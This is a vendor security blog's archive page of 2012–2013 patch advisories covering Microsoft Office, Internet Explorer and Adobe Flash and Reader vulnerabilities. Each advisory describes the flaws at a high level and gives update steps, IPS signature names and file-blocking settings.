Tag Archives: remote code execution

Office Patches Mend Word, Visio, Publisher, and Lync

May 14, 2013 by Corey Nachreiner 1 Comment

Severity: High

Summary:

  • These vulnerabilities affect: Microsoft Office related products, including Word, Visio, Publisher, and Lync
  • How an attacker exploits them: Typically by enticing users to open or interact with maliciously crafted Office documents
  • Impact: In the worst case, an attacker can gain complete control of your Windows computer
  • What to do: Install the appropriate Microsoft patches as soon as possible, or let Windows Automatic Update do it for you.

Exposure:

Today, Microsoft released four security bulletins that fix 14 vulnerabilities in a range of Microsoft Office products, including Word, Visio, Publisher, and Lync. We summarize these four security bulletins below, in order from highest to lowest severity.

  • MS13-041: Lync Remote Code Execution (RCE) Vulnerability

 Lync is a unified communications tool that combines voice, IM, audio, video, and web-based communication into one interface. It’s essentially the replacement for Microsoft Communicator. It suffers from an unspecified memory corruption vulnerability that attackers could leverage to execute arbitrary code on your computer. If an attacker can convince one of your users to join a Lync or Communicator session containing specially crafted content, they could execute code on that user’s computer, with that user’s privileges. If you grant users local administrator privileges, the attacker could gain complete control of affected computers. This flaw only affects certain versions of Lync and Communicator. See the “Affected and Non-Affected Software” section of Microsoft’s bulletin for more details.

Microsoft rating: Critical

  • MS13-042: Multiple Publisher Memory Corruption Vulnerabilities

Publisher is Microsoft’s basic desktop publishing and layout program, and part of the Office suite. It suffers from eleven memory corruption vulnerabilities. They all differ technically, but share the same scope and impact. By luring one of your users into downloading and opening a malicious Publisher document, an attacker can exploit any of these flaws to execute code on that user’s computer, with that user’s privileges. Again, if your users have local administrator privileges, the attacker gains complete control of their PCs. These flaws affect all versions of Publisher except 2013.

Microsoft rating: Important

Word is the popular word processor that ships with Office. It suffers from a remote code execution (RCE) vulnerability having to do with how it handles Word or RTF documents containing maliciously crafted shape data. By enticing one of your users to download and open a specially crafted document, an attacker could leverage this flaw to execute code on that user’s computer, with that user’s privileges. If you grant users local administrator privileges, the attacker would gain complete control of their machines. The flaw only affects Word and Word Viewer 2003.

Microsoft rating: Important

  • MS13-044 : Visio Information Disclosure Vulnerability

Microsoft Visio is a popular diagramming program often used to create network diagrams.  Visio suffers from a complex information disclosure vulnerability, involving the way it parses specially crafted XML content. At a high level, XTM documents can contain “external entities;” essentially text or binary data from an external location. If an attacker can entice one of your users into downloading and opening a malicious Visio document (containing XTM content), he can exploit this flaw to read data from files on the victim’s computer. This flaw affects all versions of Visio except 2013.

Microsoft rating: Important

Solution Path:

Microsoft has released Office-related patches that correct all of these vulnerabilities. You should download, test, and deploy the appropriate updates throughout your network as soon as possible. If you choose, you can also let Windows Update automatically download and install these updates for you.

The links below point directly to the “Affected and Non-Affected Software” section of each bulletin, where you can find all of Microsoft’s update links:

For All WatchGuard Users:

WatchGuard’s Gateway Antivirus and Intrusion Prevention services can often prevent some of these types of attacks, or the malware they try to distribute. For instance, our IPS signature team has developed a signature that can detect and block the Visio Information Disclosure issue:

  • EXPLOIT Microsoft Visio XML External Entities Resolution Vulnerability (CVE-2013-1301)

Your XTM appliance should get this new IPS update shortly.

Nonetheless, we still recommend you install Microsoft’s updates to completely protect yourself from these flaws.

Status:

Microsoft has released patches correcting these issues.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept).

What did you think of this alert? Let us know at your.opinion.matters@watchguard.com.

Security Updates
, , , , , , , , , ,

Two Critical IE Bulletins Fix Zero Day Vulnerability and More

May 14, 2013 by Corey Nachreiner 1 Comment

Severity: High

Summary:

  • These vulnerabilities affect: Internet Explorer (IE) versions 6 – 10
  • How an attacker exploits them: Typically, by enticing one of your users to visit a web page with malicious content
  • Impact: In the worst case, an attacker can execute code on your user’s computer, often gaining complete control of it
  • What to do: Install Microsoft’s IE updates immediately, or let Windows Automatic Update do it for you

Exposure:

As part of today’s Patch Day, Microsoft released two security bulletins (MS13-037/MS13-038) describing a dozen new security vulnerabilities that affect all current versions of Internet Explorer (IE). They rate both updates as Critical.

Over the last few months, most of the new flaws affecting IE are what developers call “use after free” vulnerabilities – a type of memory corruption flaw that attackers can leverage to execute arbitrary code. May’s duo of IE bulletins continues this theme, with all but one of the vulnerabilities falling under this class of flaw.

Though these dozen vulnerabilities differ technically, they share the same general scope and impact (with one small exception). If an attacker can lure one of your users to a web page containing maliciously crafted HTML, he could exploit any of these vulnerabilities to execute code on that user’s computer, inheriting that user’s privileges. Typically, Windows users have local administrative privileges, in which case the attacker can exploit these flaws to gain complete control of the victim’s computer. Keep in mind, attackers often hijack legitimate web pages and booby trap them with this sort of malicious code, in what the industry refers to as a “watering hole” attack.

Typically, Microsoft only releases one IE cumulative update a month. However, over the last few weeks attackers have exploited a zero day IE8 vulnerability in the wild—most notably against the Department of Labor (DoL) web site. We talked about this exploit in last week’s security video. Although Microsoft had released a temporary “FixIt” to mitigate this serious vulnerability, today’s second IE bulletin (MS13-038) rectifies the issue more completely. Attackers are still exploiting this flaw in the wild. They’ve worked it into their underground exploit toolkits, and even the popular Metasploit framework contains a public version of the exploit. We highly recommend you install both of Microsoft’s IE updates immediately (after testing, of course).

If you’d like more technical detail about any of these flaws, see the “Vulnerability Information” section in both of Microsoft’s bulletins (MS13-037/MS13-038).

Solution Path:

You should download, test, and deploy the appropriate IE updates immediately, or let Windows Automatic Update do it for you. You can find links to the various IE updates in the “Affected and Non-Affected Software” section of Microsoft’s IE security bulletins:

For All WatchGuard Users:

WatchGuard’s Gateway Antivirus and Intrusion Prevention services can often prevent these sorts of attacks, or the malware they try to distribute. For instance, our IPS signature team has developed signatures that can detect and block many of the “use after free” vulnerabilities described in Microsoft’s alert:

  • WEB-CLIENT Microsoft Internet Explorer Use After Free Vulnerability (CVE-2013-2551)
  • WEB-CLIENT Microsoft Internet Explorer Use After Free Vulnerability (CVE-2013-1309)
  • WEB-CLIENT Microsoft Internet Explorer Use After Free Vulnerability (CVE-2013-1311)
  • WEB-CLIENT Microsoft Internet Explorer Use After Free Vulnerability (CVE-2013-1312)
  • WEB-CLIENT Microsoft Internet Explorer Use After Free Vulnerability (CVE-2013-1307)
  • WEB-CLIENT Microsoft Internet Explorer Use After Free Vulnerability (CVE-2013-1308)
  • WEB-CLIENT Microsoft Internet Explorer JSON Array Information Disclosure Vulnerability (CVE-2013-1297)

Your XTM appliance should get this new IPS update shortly.

Furthermore, our Reputation Enabled Defense (RED) and WebBlocker services can often prevent your users from accidentally visiting malicious (or legitimate but booby-trapped) web sites that contain these sorts of attacks. Nonetheless, we still recommend you install Microsoft’s updates to completely protect yourself from all of these flaws.

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept).

Security Updates
, , , , , , , , ,

“Use After Free” Flaws: A New Theme for IE Vulnerability

April 9, 2013 by Corey Nachreiner 2 Comments

Severity: High

Summary:

  • These vulnerabilities affect: Most current versions of Internet Explorer (IE)
  • How an attacker exploits them: By enticing one of your users to visit a malicious web page
  • Impact: An attacker can execute code on your user’s computer, often gaining complete control of it
  • What to do: Install Microsoft’s IE updates immediately, or let Windows Automatic Update do it for you

Exposure:

As part of today’s Patch Day, Microsoft released a security bulletin describing two new security vulnerabilities affecting Internet Explorer (IE). Similar to the flaws in last month’s update, both of these vulnerabilities are what developers call “use after free” vulnerabilities – a type of memory corruption flaw that attackers can leverage to execute arbitrary code. This class of vulnerability seems to be a theme for IE lately, since Microsoft has been fixing IE use after free flaws quite a bit over the last few months.

In any case, if an attacker can lure one of your users to a web page containing maliciously crafted HTML, she could exploit either of these vulnerabilities to execute code on that user’s computer, inheriting that user’s privileges. Typically, Windows users have local administrative privileges, in which case the attacker can exploit these flaws to gain complete control of the victim’s computer.

If you’d like more technical detail about either of these flaws, see the “Vulnerability Information” section of Microsoft’s bulletin. Technicalities aside, both of these remote code execution flaws pose significant risk to IE users, and allow attackers to launch drive-by download attacks. Attackers often hijack legitimate web sites and force them to serve this kind of malicious web code. So these types of flaws may affect you even when visiting legitimate, trusted web sites.

If you use IE, you should download and install Microsoft’s cumulative update immediately.

Solution Path:

You should download, test, and deploy the appropriate IE updates immediately, or let Windows Automatic Update do it for you. You can find links to the various IE updates in the “Affected and Non-Affected Software” section of Microsoft’s IE security bulletin.

For All WatchGuard Users:

WatchGuard’s Gateway Antivirus services can often prevent the malware that drive-by download attacks try to force onto your computer. Furthermore, our Reputation Enabled Defense (RED) and WebBlocker service can often prevent your users from accidentally visiting malicious sites. Nonetheless, we still recommend you install Microsoft’s IE update to completely protect yourself from these vulnerabilities.

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept).

Security Updates
, , , , ,

IE Update Fixes Multiple “Use After Free” Vulnerabilities

March 12, 2013 by Corey Nachreiner 4 Comments

Severity: High

Summary:

  • These vulnerabilities affect: Most current versions of Internet Explorer (IE)
  • How an attacker exploits them: By enticing one of your users to visit a malicious web page
  • Impact: An attacker can execute code on your user’s computer, often gaining complete control of it
  • What to do: Install Microsoft’s IE updates immediately, or let Windows Automatic Update do it for you

Exposure:

As part of today’s Patch Day, Microsoft released a security bulletin describing nine new security vulnerabilities affecting Internet Explorer (IE). Similar to the last  few IE updates, all nine of these security flaws are what developers call “use after free” vulnerabilities, which are types of memory corruption flaws that attackers can leverage to execute arbitrary code. They all have to do with how IE handles various HTML objects and elements. If an attacker can lure one of your users to a web page containing maliciously crafted HTML, he could exploit any one of these vulnerabilities to execute code on that user’s computer, inheriting that user’s privileges. Typically, Windows users have local administrative privileges, in which case the attacker can exploit these flaws to gain complete control of the victim’s computer.

If you’d like more technical detail about these flaws, see the “Vulnerability Information” section of Microsoft’s bulletin. Details aside, all of these remote code execution flaws pose significant risk to IE users, and allow attackers to launch drive-by download attacks. Attackers often hijack legitimate web sites and force them to serve this kind of malicious web code. So these types of flaws may affect you even when visiting legitimate, trusted web sites.

If you use IE, you should download and install Microsoft’s cumulative update immediately.

Solution Path:

You should download, test, and deploy the appropriate IE updates immediately, or let Windows Automatic Update do it for you. You can find links to the various IE updates in the “Affected and Non-Affected Software” section of Microsoft’s IE security bulletin.

For All WatchGuard Users:

WatchGuard’s Gateway Antivirus and Intrusion Prevention services can often prevent these sorts of attacks, or the malware they try to distribute.

More specifically, our IPS signature team has developed new signatures, which can detect and block a number of these new IE vulnerabilities:

  • WEB-CLIENT Microsoft Internet Explorer GetMarkupPtr Use After Free Vulnerability (CVE-2013-0092)
  • WEB-CLIENT Microsoft Internet Explorer CTreeNode Use After Free Vulnerability (CVE-2013-1288)
  • WEB-CLIENT Microsoft Internet Explorer CElement Use After Free Vulnerability (CVE-2013-0091)
  • WEB-CLIENT Microsoft Internet Explorer OnResize Use After Free Vulnerability (CVE-2013-0087)
  • WEB-CLIENT Microsoft Internet Explorer saveHistory Use After Free Vulnerability (CVE-2013-0088)
  • WEB-CLIENT Microsoft Internet Explorer CMarkupBehaviorContext Use After Free Vulnerability (CVE-2013-0089)
  • WEB-CLIENT Microsoft Internet Explorer CCaret Use After Free Vulnerability (CVE-2013-0090)
  • WEB-CLIENT Microsoft Internet Explorer removeChild Use After Free Vulnerability (CVE-2013-0094)

Nonetheless, we still recommend you install Microsoft’s IE update to completely protect yourself from these vulnerabilities.

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept).

Security Updates
, , , , ,

Two IE Bulletins Double the Browser Updates

February 12, 2013 by Corey Nachreiner 0 Comments

Severity: High

Summary:

  • These vulnerabilities affect: Internet Explorer (IE) 10 and earlier
  • How an attacker exploits them: Typically, by enticing one of your users to visit a web page with malicious content
  • Impact: Various; In the worst case, an attacker can execute code on your user’s computer, often gaining complete control of it
  • What to do: Install Microsoft’s Internet Explorer updates immediately, or let Windows Automatic Update do it for you

Exposure:

In a relatively unusual move, Microsoft released two Internet Explorer (IE) security bulletins today, rather than their typical single cumulative update. Combined, the two bulletins fix 14 vulnerabilities in the popular web browser, many of which allow attackers to execute code on vulnerable Windows systems.

We summarize the two bulletins below:

  • MS13-009: February IE Cumulative Update

This update fixes 13 vulnerabilities in IE, most of them being  “use after free” vulnerabilities similar to the ones Microsoft fixed with last month’s out-0f-cycle IE bulletin.  By luring one of your users to a web site containing malicious code, a remote attacker can exploit most of these vulnerabilities to execute code on your computer, with your privileges.  As always, if you have local administrator privileges, the attacker could exploit this issue to gain complete control of your computer.

Microsoft rating: Critical

  • MS13-010: VML Memory Corruption Vulnerability

Vector Markup Language (VML) is a graphics standard for creating 2D vector illustrations with XML files. The VML component in IE suffers from a memory corruption vulnerability having to do with how it allocates buffers. By enticing your users to a web site with specially crafted content, a remote attacker could exploit this flaw to execute code on that user’s computer, with the user’s privileges. Since most Windows users have local administrative privileges, this sort of attack often gives the attacker complete control of their computers.

Microsoft rating: Critical

Malicious hackers often leverage these types of vulnerabilities in drive-by download attacks, and they also target legitimate web sites and booby-trap them with malicious code. In other words, you can sometimes encounter these sorts of “drive-by download” attacks even while visiting trusted, legitimate web sites. We recommend you update your IE users immediately.

Solution Path:

These updates fix serious issues. You should download, test, and deploy the appropriate IE patches immediately, or let Windows Automatic Update do it for you.

The links below point directly to the “Affected and Non-Affected Software” section of each bulletin, where you can find links to the various updates:

For All WatchGuard Users:

These attacks travel as normal-looking HTTP traffic, which you must allow if your network users need to access the World Wide Web. Therefore, the patches above are your best solution.

That said, WatchGuard’s Gateway Antivirus and Intrusion Prevention Service can often prevent these sorts of attacks, or the malware they try to distribute. For instance, our IPS team has created signatures for  the following:

  • Various “use after free” vulnerabilities - CVE-2013-0018, CVE-2013-0019, CVE-2013-0020, CVE-2013-0021, CVE-2013-0022, CVE-2013-0023, CVE-2013-0024, CVE-2013-0025, CVE-2013-0026, CVE-2013-0027, CVE-2013-0028, CVE-2013-0029
  • JIS character encoding vulnerability - CVE-2013-0015
  • VML memory corruption vulnerability - CVE-2013-0030

These signatures will be available in our next IPS update, which should come out shortly. We highly recommend you enable our security services on your WatchGuard XTM and XCS appliances, and keep IPS and AV up to date.

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept).

Security Updates
, , , , , ,

Emergency Flash Update Fixes “In the Wild” Vulnerabilities

February 7, 2013 by Corey Nachreiner 5 Comments

Summary:

  • These vulnerabilities affect: Adobe Flash Player running on all platforms
  • How an attacker exploits it: By opening any malicious Flash (SWF) content; whether from a web site, within a Word document, and so on
  • Impact: In the worst case, an attacker can execute code on the user’s computer, potentially gaining control of it
  • What to do: Download and install the latest version of Adobe Flash Player for your platform

Exposure:

Adobe Flash Player displays interactive, animated web content called Flash. Although Flash is optional, 99% of PC users download and install it to view multimedia web content. It runs on many operating systems, including mobile operating systems like Android.

Today, Adobe released an emergency security bulletin to fix two Flash Player vulnerabilities, which attackers are actively exploiting in the wild. Both flaws are memory corruption-related issues; one being a buffer overflow vulnerability. If an attacker can entice one of your users into opening any Flash content, he could exploit either of these flaws to execute code on that user’s computer, with that user’s privileges. If your Windows users have local administrator privileges, an attacker could exploit this flaw to gain full control of their PCs.

As mentioned earlier, attackers are actively exploiting both these vulnerabilities in the wild. Currently, the attackers try to deliver the malicious Flash either via a booby-trapped web site, or by embedding it within malicious Word documents.

Besides patching, we recommend you educate your users about the dangers of interacting with unsolicited Word (or PDF) documents. Many of the more advanced breaches over the last few years have begun as very targeted spear-phishing emails which included malicious Word or PDF documents. Although security appliances, like WatchGuard’s, can detect some of these malicious documents using AV and IPS, you should still inform your employees to remain vigilant against these sorts of attacks.

Solution Path

Adobe has released new versions of Flash Player to fix these issues. If you allow Adobe Flash in your network, you should download and install the new versions immediately. If you’ve enabled Flash Player’s recent “silent update” option, you will receive this update automatically.

You can download Flash for your computer at the link provided below. See the bulletin’s “Affected Software” section for more details on getting Flash updates for other platforms:

Keep in mind, if you use Google Chrome you’ll have to update it separately.

For All WatchGuard Users:

If you choose, you can configure the HTTP proxy on your XTM appliance to block Flash content (and Word documents). Keep in mind, doing so blocks all such content, whether legitimate or malicious.

Our proxies offer many ways for you to block files and content, including by file extensionMIME type, or by using very specific hexidecimal patterns found in the body of a message – a technique sometimes referred to as Magic Byte detection. Below I list the various ways you can identify these various files:

File Extension:

  • .flv –  Adobe Flash file (file typically used on websites)
  • .fla – Flash movie file
  • .f4v – Flash video file
  • .f4p - Protected Flash video file
  • .f4a – Flash audio file
  • .f4b – Flash audiobook file

MIME types:

  • video/x-flv
  • video/mp4 (used for more than just Flash)
  • audio/mp4 (used for more than just Flash)

FILExt.com reported Magic Byte Pattern:

  •  FLV Hex: 46 4C 56 01
  • FLV ASCII: FLV
  • FLA Hex:  D0 CF 11 E0 A1 B1 1A E1 00

(Keep in mind, not all the Hex and ASCII patterns shared here are appropriate for content blocking. If the pattern is too short, or not unique enough, blocking with them could result in many false positives.) 

If you decide you want to block these files, the links below contain instructions that will help you configure your XTM proxy’s content blocking features using the file and MIME information listed above.

Status:

Adobe has released updates to fix these Flash vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept)

Security Updates
, , , , , , ,

Avoid Drive-by Downloads; Patch IE

December 11, 2012 by Corey Nachreiner 5 Comments

Severity: High

Summary:

  • These vulnerabilities affect: All current versions of Internet Explorer (IE)
  • How an attacker exploits them: By enticing one of your users to visit a malicious web page
  • Impact: An attacker can execute code on your user’s computer, often gaining complete control of it
  • What to do: Install Microsoft’s IE updates immediately, or let Windows Automatic Update do it for you

Exposure:

As part of today’s Patch Day, Microsoft released a security bulletin describing three new security vulnerabilities affecting Internet Explorer (IE). Technically, the new vulnerabilities seem only to affect IE 9 and 10, yet Microsoft has released the cumulative update for all versions. They rate this update as Critical.

Similar to last month, all three of these security flaws are “use after free” vulnerabilities, which are types of memory corruption flaws that attackers can leverage to execute arbitrary code. They all have to do with how IE handles various HTML objects. If an attacker can lure one of your users to a web page containing maliciously crafted HTML, he could exploit any one of these vulnerabilities to execute code on that user’s computer, inheriting that user’s privileges. Typically, Windows users have local administrative privileges, in which case the attacker can exploit these flaws to gain complete control of the victim’s computer.

If you’d like more technical detail about these flaws, see the “Vulnerability Information” section of Microsoft’s bulletin. Details aside, all of these remote code execution flaws pose significant risk to IE users, and allow attackers to launch drive-by download attacks. Attackers often hijack legitimate web sites and force them to serve this kind of malicious web code. So these types of flaws may affect you even when visiting legitimate, trusted web sites.  If you use IE, you should download and install Microsoft’s cumulative update immediately.

Solution Path:

You should download, test, and deploy the appropriate IE updates immediately, or let Windows Automatic Update do it for you. You can find links to the various IE updates in the “Affected and Non-Affected Software” section of Microsoft’s IE security bulletin.

For All WatchGuard Users:

WatchGuard’s Gateway Antivirus and Intrusion Prevention services can often prevent these sorts of attacks, or the malware they try to distribute.

More specifically, our IPS signature team has developed a new signatures, which can detect and block at least one of these new IE vulnerabilities:

  • WEB-CLIENT Microsoft Internet Explorer Improper Ref Counting Use After Free (CVE-2012-4787)

Your appliance should get this new IPS update shortly.

Nonetheless, we still recommend you install Microsoft’s IE update to completely protect yourself from these vulnerabilities.

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP.

Security Updates
, , , , ,

Three Critical Vulnerabilities Only Affect IE 9

November 13, 2012 by Corey Nachreiner 4 Comments

Severity: High

Summary:

  • These vulnerabilities affect: Internet Explorer (IE) 9 only
  • How an attacker exploits them: By enticing one of your users to visit a malicious web page
  • Impact: An attacker can execute code on your user’s computer, often gaining complete control of it
  • What to do: Install Microsoft’s Internet Explorer 9 updates immediately, or let Windows Automatic Update do it for you

Exposure:

As part of today’s Patch Day, Microsoft released a security bulletin describing three new security vulnerabilities that affect Internet Explorer (IE) 9.0, running on Windows Vista, 7, and Server 2008. These vulnerabilities do not affect any other versions of IE. Microsoft rates the aggregate severity of these new flaws as Critical.

The three security flaws are all “use after free” vulnerabilities, which are types of memory corruption flaws that attackers can leverage to execute arbitrary code. They all have to do with how IE handles various specially crafted HTML objects.  If an attacker can lure one of your users to a web page containing maliciously crafted HTML, he could exploit any one of these vulnerabilities to execute code on that user’s computer, inheriting that user’s privileges. Typically, Windows users have local administrative privileges, in which case the attacker can exploit these flaws to gain complete control of the victim’s computer.

If you’d like to know more about the technical differences between these flaws, see the “Vulnerability Information” section of Microsoft’s bulletin. Details aside, all of these remote code execution flaws pose significant risk to IE users, and allow attackers to launch drive-by download attacks. Attackers often hijack legitimate web sites and force them to serve this kind of malicious web code. So these types of flaws may affect you even when visiting legitimate, trusted web sites.  If you use IE, you should download and install Microsoft’s cumulative update immediately.

Solution Path:

You should download, test, and deploy the appropriate IE updates immediately, or let Windows Automatic Update do it for you. You can find links to the various IE updates in the “Affected and Non-Affected Software” section of Microsoft’s IE security bulletin.

For All WatchGuard Users:

WatchGuard’s Gateway Antivirus and Intrusion Prevention services can often prevent these sorts of attacks, or the malware these attacks try to distribute.

More specifically, our IPS signature team has developed three new signatures, which can detect and block these new IE vulnerabilities:

  • WEB-CLIENT Microsoft IE CTreeNode Use After Free Vulnerability (CVE-2012-4775)
  • EXPLOIT Microsoft IE CFormElement Use After Free Vulnerability (CVE-2012-1538)
  • EXPLOIT Microsoft IE CTreePos Use After Free Vulnerability (CVE-2012-1539)

Your appliance should get this new IPS update shortly.

Nonetheless, we still recommend you install Microsoft’s IE update to completely protect yourself from these vulnerabilities.

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP.

Security Updates
, , , , ,

Adobe Flash Player Update and Reader X 0day

November 8, 2012 by Corey Nachreiner 3 Comments

Summary:

  • These vulnerabilities affect: Adobe Flash Player running on all platforms, Adobe Air, and all versions of Reader X
  • How an attacker exploits it: By enticing users to visit a website containing malicious Flash content (or into downloading and opening a malicious PDF)
  • Impact: In the worst case, an attacker can execute code on the user’s computer, potentially gaining control of it
  • What to do: Download and install the latest version of Adobe Flash Player for your platform (see Solution section for Reader X flaw mitigation)

Exposure:

Adobe Flash Player displays interactive, animated web content called Flash. Although Flash is optional, 99% of PC users download and install it to view multimedia web content. It runs on many operating systems, including mobile operating systems like Android.

This week, Adobe released a security bulletin describing seven security vulnerabilities  (based on CVE numbers) that affect Flash Player running on any platform. It doesn’t describe the flaws in much technical detail, other than mentioning they consist of buffer overflow vulnerabilities and other types of memory corruption flaws. That said, Adobe does warn that if an attacker can entice one of your users to visit a malicious website containing specially crafted Flash content, he could exploit any of these flaws to execute code on that user’s computer, with that user’s privileges. If your Windows users have local administrator privileges, an attacker could exploit this flaw to gain full control of their PCs.

Though it doesn’t look like attackers are exploiting these Flash flaws in the wild yet, Adobe rates them as “Priority 1” for Windows users, and recommends you apply the Windows updates within 72 hours. These vulnerabilities also affect other platforms as well, though not as severely. I recommend you update any Flash capable device as soon as you can.

In semi-related news, a Russian security group warns they have found attackers exploiting a zero day Adobe Reader X vulnerability in the wild. The flaw affects the most recent versions of the popular PDF reader, and can even escape its sandbox protection. In short, if you interact with the wrong PDF document, an attacker could gain complete control of your computer. The good news is the web version of this attack does require a victim to close and re-open their browser to succeed, making it a little harder to pull off.

At the time of writing, Adobe has yet to respond to this zero day report, and has not released a patch. Your primary recourse is to try to avoid unsolicited PDF documents. You can also leverage WatchGuard’s file-blocking capabilities to temporarily restrict your user’s access to PDF files, though this will also prevent them from downloading legitimate ones, too.

One final note: Next month Adobe plans to sync their Flash updates with Microsoft’s Patch Tuesday updates. So you can expect all future Adobe updates (other than perhaps emergency ones), on the second Tuesday of the month.

Solution Path

Adobe has released new versions of Flash Player to fix these issues. If you allow Adobe Flash in your network, you should download and install the new versions immediately. If you’ve enabled Flash Player’s recent “silent update” option, you will receive this update automatically.

You can download Flash for your computer at the link provided below. See the bulletin’s “Affected Software” section for more details on getting Flash updates for other platforms:

Keep in mind, if you use Google Chrome you’ll have to update it separately.
There is no fix for the zero day Reader X vulnerability. We recommend you avoid handling unsolicited PDF documents, or you can block them on all our security appliances.

For All WatchGuard Users:

If you choose, you can configure the HTTP proxy on your XTM appliance to block Flash or PDF content. Keep in mind, doing so blocks all such content, whether legitimate or malicious.

Our proxies offer many ways for you to block files and content, including by file extensionMIME type, or by using very specific hexidecimal patterns found in the body of a message – a technique sometimes referred to as Magic Byte detection. Below I list the various ways you can identify these various files:

File Extension:

  • .flv –  Adobe Flash file (file typically used on websites)
  • .fla – Flash movie file
  • .f4v – Flash video file
  • .f4p - Protected Flash video file
  • .f4a – Flash audio file
  • .f4b – Flash audiobook file
  • .PDF – Adobe Reader document

MIME types:

  • video/x-flv
  • video/mp4 (used for more than just Flash)
  • audio/mp4 (used for more than just Flash)
  • application/pdf
  • application/x-pdf
  • application/acrobat
  • applications/vnd.pdf
  • text/pdf
  • text/x-pdf

FILExt.com reported Magic Byte Pattern:

  •  FLV Hex: 46 4C 56 01
  • FLV ASCII: FLV
  • FLA Hex:  D0 CF 11 E0 A1 B1 1A E1 00
  • PDF Hex: 25 50 44 46 2D 31 2E
  • PDF ASCII: %PDF-1

(Keep in mind, not all the Hex and ASCII patterns shared here are appropriate for content blocking. If the pattern is too short, or not unique enough, blocking with them could result in many false positives.) 

If you decide you want to block these files, the links below contain instructions that will help you configure your Firebox proxy’s content blocking features using the file and MIME information listed above.

Status:

Adobe has released updates to fix these Flash vulnerabilities, however, they have not yet responded to the Reader X zero day.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept)

Security Updates
, , , , ,

Four Updates Repair Office and Server Software Vulnerabilities

October 9, 2012 by Corey Nachreiner 2 Comments

Severity: High

Summary:

  • These vulnerabilities affect: Microsoft Office related products, including Word, Works, Sharepoint, InfoPack, Communicator, Lync, Groove, and more
  • How an attacker exploits them: Multiple vectors of attack, including enticing users to click specially crafted links, or to open specially crafted documents
  • Impact: In the worst case, an attacker can gain complete control of your Windows computer
  • What to do: Install the appropriate Microsoft patches as soon as possible, or let Windows Automatic Update do it for you.

Exposure:

Today, Microsoft released four security bulletins that fix around 20 vulnerabilities in a wide range of Microsoft Office and Server Software products. The affected products include:

  • Word and Word Viewer
  • Works 9
  • Sharepoint Server
  • InfoPath
  • Communicator and the new Lync
  • Groove
  • FAST Search Server
  • and the Office Web Apps

I summarize these four security bulletins below, in order from highest to lowest severity.

  • MS12-064: Two Word Memory Corruption Vulnerabilities

Word is the popular word processor that ships with Office. It suffers from two memory corruptions vulnerabilities having to do with how it handles maliciously crafted Word or RTF documents. By enticing one of your users to download and open a specially crafted document, an attacker could leverage either of these flaws to execute code on that user’s computer, with that user’s privileges. If you grant users local administrator privileges, the attacker could leverage these vulnerabilities to gain complete control of their machines. These flaws affect all current versions of Word; including Word Viewer, the Office Compatibility Pack, and the Office Web Apps.

Microsoft rating: Critical

  • MS12-065: Works 9 Heap Buffer Overflow Vulnerability

Works is a light-weight word processor, which is less expensive that Word but lacking in features. It suffers from a buffer overflow vulnerability having to do with how it handles malformed Word documents. By luring one of your users into downloading and opening a malicious Word document, an attacker can exploit this buffer overflow to execute code on that user’s computer, with that user’s privileges. Again, if your users have local administrator privileges, the attacker gains complete control of their PCs. The flaw only affects Works 9.

Microsoft rating: Important

  • MS12-066 :  Microsoft Server Software XSS Vulnerability

Many of Microsoft’s Server Software products (including Sharepoint Server, Communicator and Lync, InfoPath, and Groove) suffer from a Cross-site Scripting (XSS) vulnerability having to do with the servers’ inability to properly sanitize HTML inputs. The bulletin doesn’t describe exactly what element of these web-based servers suffers from the XSS vulnerability; only that they do. In any case, if an attacker can trick you into clicking a specially crafted link, he could leverage this flaw to to steal your web cookie, hijack your web session, or essentially take any action you could on the vulnerable server. In some cases, attackers can even leverage XSS attacks to hijack your web browser, and gain unauthorized access to your computer.

Microsoft rating: Important

  • MS12-067 : FAST Search Server Oracle Outside In Vulnerabilities

Microsoft’s FAST Search Server improves the searchability of your SharePoint infrastructure. In previous alerts and videos, we warned you that Microsoft Exchange leveraged Oracle’s Outside In technology to parse various types of file attachments, and that Outside In suffered from a number remote code execution vulnerabilities. FAST Search Server implements Outside In, and also suffers from these vulnerabilities. If an attacker can upload a specially crafted file to a share that FAST Search Server indexes, he could leverage these vulnerabilities to execute arbitrary code on the FAST Search Server. However, two factors significantly mitigate the severity of these issues. First, most administrators only use this server to index internal file shares, which means the attacker needs local access and privilege to upload her malicious file. Furthermore, the attacker could only execute code with the limited privileges of a “user account with a restricted token.”

Microsoft rating: Important

Solution Path:

Microsoft has released Office and Server Software patches that correct all of these vulnerabilities. You should download, test, and deploy the appropriate Windows patches throughout your network immediately. If you choose, you can also let Windows Update automatically download and install these updates for you. That said, we highly recommend you test server updates before deploying them, so you may not want to turn on automatic updates for your servers.

The links below point directly to the “Affected and Non-Affected Software” section of each bulletin, where you can find all of Microsoft’s update links:

For All WatchGuard Users:

Our XTM security appliances can mitigate the risk of many of these flaws. One of our generic XSS detection signatures already detects and prevents the XSS flaw described in MS12-066. Furthermore, with information from Microsoft’s Active Protections Program (MAPP), we have already developed a signature for the RTF exploit described in MS12-064, which we will include in a new signature set your appliance should get shortly.

Furthermore, WatchGuard’s Gataway Antivirus (GAV) service detects most of the common malware attackers try to deliver when exploiting these flaws. In short, if you have our UTM bundle and enable IPS and GAV, we can protect you from many attacks that try to leverage these flaws.

Nonetheless, Attackers can exploit these flaws in other ways as well, including uploading malicious files locally. We still recommend you install Microsoft’s updates as quickly as possible to completely protect yourself from these flaws.

Status:

Microsoft has released patches correcting these issues.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept).

What did you think of this alert? Let us know at your.opinion.matters@watchguard.com.

Security Updates
, , , , , , , , , , , , ,
Older Entries

Follow

Get every new post delivered to your Inbox.

Join 7,114 other followers

%d bloggers like this: